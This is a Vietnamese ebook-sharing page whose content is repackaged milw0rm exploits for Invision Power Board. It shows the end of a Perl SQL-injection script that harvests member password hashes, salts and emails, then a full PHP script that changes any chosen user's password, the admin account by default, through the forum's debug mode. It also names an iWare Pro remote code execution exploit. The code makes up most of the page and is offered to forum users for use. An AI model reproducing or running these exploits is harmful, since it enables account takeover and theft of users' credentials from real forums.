1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 386 pps

6 56 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 34,45 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Affects Invision Power Borard 2.0.0 to 2.1.7 by Rapigator This works if: "Debug Level" is set to 3 or Enable SQL Debug Mode is turned on In General Configuration of the forum software...

Trang 1

$own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";

query($own_query,$server,$dir);

if(length($rep)==5)

{

$salt = $rep;

$own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";

query($own_query,$server,$dir);

if(length($rep)>0) {

$email = $rep;

print RES $id.":".$hash.":".$salt."::".$email."\n"; }

} }

}

close(RES);

print "[!] Query was successfully perfomed Results are in txt files\r\n";

&footer();

$ex = <STDIN>;

sub footer()

{

print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";

print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";

}

sub header()

{

print q(

-

* Invision Power Board 2.1.* Remote SQL Injecton Exploit *

* Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) *

* Coded by w4g.not null *

* FOR EDUCATIONAL PURPOSES *ONLY* *

-

);

}

sub info()

{

Trang 2

print q(

[i] Usage: perl w4gipb216.pl [server] [/dir/]

where

|- server - server, where IPB installed without http://

|- /dir/ - dir, where IPB installed or / for no dir

e.g perl w4gipb216.pl someserver.com /forum/

[i] Stealing info about users (format id:pass:salt::email)

[!] Need MySQL > 4.0

);

}

sub query()

{

my($q,$server,$dir) = @_;

$res =

$ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'

=>"' ".$q);

if($res->is_success)

{

$rep = '';

if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }

else

if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }

}

}

return $rep;

}

# milw0rm.com [2006-07-18]

langtuhaohoa(HCE)

Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit

Trích:

<?php

/*

Debug Mode password change vulnerability

Trang 3

Affects Invision Power Borard 2.0.0 to 2.1.7

by Rapigator

This works if:

"Debug Level" is set to 3

or

Enable SQL Debug Mode is turned on

In General Configuration of the forum software

*/

// The forum's address up to and including 'index.php'

$site = "http://localhost/forums/index.php";

// An existing user's login name

$name = "admin";

// The new password(3-32 characters)

$pass = "1234";

// You can use a proxy

// $proxy = "1.2.3.4:8080";

// -

$site = "?";

$suffix = "";

$name = urlencode($name);

$pass = urlencode($pass);

$curl = curl_init($site.'act=Reg&CODE=10');

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span

Trang 4

class=\'purple\'>([\\w]*?)_reg_antispam<\/span>

\\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page,

$regs)) {

$prefix = $regs[1];

$regid = $regs[2];

$regcode = $regs[3];

} else {

$suffix = "&debug=1";

$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam

\\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page,

$regs)) {

$prefix = $regs[1];

$regid = $regs[2];

$regcode = $regs[3];

}

}

if (!isset($regid) || !isset($regcode)) {

echo "Error: Probably not vulnerable, or no forum found";

exit;

}

$curl = curl_init($site.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_POST, 1);

curl_setopt($curl, CURLOPT_POSTFIELDS,

"act=Reg&CODE=11&member_name={$name}&regid={$regid

}&reg_code={$regcode}");

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span

class=\'purple\'>'.$prefix.'_validating<\/span>

Trang 5

\\(vid,member_id,real_group,temp_group,entry_date,

coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/',

$page, $regs)) {

change_pass($regcode,$regid,$regs[1],$regs[2]);

}

if (preg_match('/INSERT INTO '.$prefix.'_validating

\\(vid,member_id,real_group,temp_group,entry_date,

coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/',

$page, $regs)) {

change_pass($regcode,$regid,$regs[1],$regs[2]);

}

function change_pass($regcode,$regid,$vid,$userid) {

global $site, $proxy, $name, $pass;

$curl = curl_init($site.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_POST, 1);

curl_setopt($curl, CURLOPT_POSTFIELDS,

"act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={

$vid}&regid={$regid}&reg_code={$regcode}&pass1={$p

ass}&pass2={$pass}");

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

echo "Password Changed!";

exit;

}

?>

# milw0rm.com [2006-11-01]

enjoy nào anh em

Navaro(HCE)

iWare Pro <= 5.0.4 (chat_panel.php) Remote Code Execution Vulnerability

Code:

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN